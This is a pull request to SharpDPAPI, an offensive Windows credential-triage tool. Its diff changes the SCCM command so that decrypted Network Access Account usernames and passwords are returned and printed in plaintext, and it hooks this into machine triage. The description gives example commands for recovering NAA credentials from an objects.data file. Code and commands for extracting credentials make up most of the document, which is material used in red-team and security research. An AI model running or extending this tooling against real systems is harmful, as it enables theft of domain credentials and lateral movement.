### PR TITLE
[SCCM] Credentials from objects.data

### DIFF
--- a/SharpDPAPI/Commands/Machinetriage.cs
+++ b/SharpDPAPI/Commands/Machinetriage.cs
@@ -32,6 +32,7 @@ namespace SharpDPAPI.Commands
                 Triage.TriageSystemCreds(mappings);
                 Triage.TriageSystemVaults(mappings);
                 Triage.TriageSystemCerts(mappings);
+                SCCM.LocalNetworkAccessAccountsWmi();
             }
         }
     }

--- a/SharpDPAPI/Commands/Machinetriage.cs
+++ b/SharpDPAPI/Commands/Machinetriage.cs
@@ -32,7 +32,7 @@ namespace SharpDPAPI.Commands
                 Triage.TriageSystemCreds(mappings);
                 Triage.TriageSystemVaults(mappings);
                 Triage.TriageSystemCerts(mappings);
-                SCCM.LocalNetworkAccessAccountsWmi();
+                SCCM.LocalNetworkAccessAccountsWmi(mappings);
             }
         }
     }

--- a/SharpDPAPI/Commands/SCCM.cs
+++ b/SharpDPAPI/Commands/SCCM.cs
@@ -138,7 +138,7 @@ namespace SharpDPAPI.Commands
                                 }
                                 else
                                 {
-                                    Console.WriteLine("{0}: {1}", prop.Name, prop.Value);
+                                    //Console.WriteLine("{0}: {1}", prop.Name, prop.Value);
                                 }
                             }
                         }
@@ -152,7 +152,7 @@ namespace SharpDPAPI.Commands
             }
         }
 
-        public static void NAADecrypt(string blob, Dictionary<string, string> masterkeys)
+        public static string NAADecrypt(string blob, Dictionary<string, string> masterkeys)
         {
             byte[] blobBytes = new byte[blob.Length / 2];
             for (int i = 0; i < blob.Length; i += 2)
@@ -181,19 +181,31 @@ namespace SharpDPAPI.Commands
                             byte[] decBytes = new byte[finalIndex + 1];
                             Array.Copy(decBytesRaw, 0, decBytes, 0, finalIndex);
                             data = Encoding.Unicode.GetString(decBytes);
+                            return data;
                         }
                         else
                         {
                             data = Encoding.ASCII.GetString(decBytesRaw);
+                            return data;
                         }
+
                         Console.WriteLine("    dec(blob)        : {0}", data);
                     }
                     else
                     {
                         string hexData = BitConverter.ToString(decBytesRaw).Replace("-", " ");
                         Console.WriteLine("    dec(blob)        : {0}", hexData);
+                        return hexData;
                     }
                 }
+                else
+                {
+                    return null;
+                }
+            }
+            else
+            {
+                return null;
             }
         }
 
@@ -232,8 +244,15 @@ namespace SharpDPAPI.Commands
 
                             try
                             {
-                                NAADecrypt(protectedUsername, mappings);
-                                NAADecrypt(protectedPassword, mappings);
+                                string username = "";
+                                string password = "";
+
+                                Console.WriteLine("\r\n[*] Triaging SCCM Network Access Account Credentials\r\n");
+                                username = NAADecrypt(protectedUsername, mappings);
+                                password = NAADecrypt(protectedPassword, mappings);
+
+                                Console.WriteLine("    Plaintext NAA Username        : {0}", username);
+                                Console.WriteLine("    Plaintext NAA Password        : {0}", password);
                             }
                             catch (Exception e)
                             {

--- a/SharpDPAPI/Commands/SCCM.cs
+++ b/SharpDPAPI/Commands/SCCM.cs
@@ -142,7 +142,7 @@ namespace SharpDPAPI.Commands
                                 }
                             }
                         }
-                        Console.WriteLine("-----------------------------------");
+                        //Console.WriteLine("-----------------------------------");
                     }
                 }
             }

--- a/SharpDPAPI/Program.cs
+++ b/SharpDPAPI/Program.cs
@@ -73,7 +73,7 @@ namespace SharpDPAPI
                 return "Error parsing arguments: ${command}";
             }
 
-            var commandName = args.Length != 0 ? args[0] : "";
+            var commandName = args.Length != 0 ?  args[0].ToLower() : "";
 
             TextWriter realStdOut = Console.Out;
             TextWriter realStdErr = Console.Error;
@@ -108,7 +108,7 @@ namespace SharpDPAPI
                     return;
                 }
 
-                var commandName = args.Length != 0 ? args[0] : "";
+                var commandName = args.Length != 0 ? args[0].ToLower() : "";
 
                 if (parsed.Arguments.ContainsKey("/consoleoutfile"))
                 {


### PR DESCRIPTION
Hello

Based on the article (https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9).

I made a method to parse the objects.data file and retrieve NAA creds on disk.

Example:
```
.\SharpDPAPI sccm /useobjectfile
```

or from a given file

```
.\SharpDPAPI sccm /useobjectfile /mkfile:<masterkeys file> /pathToFile:<path to a objects.data file>
```

The PR is based on the @subat0mik's one.

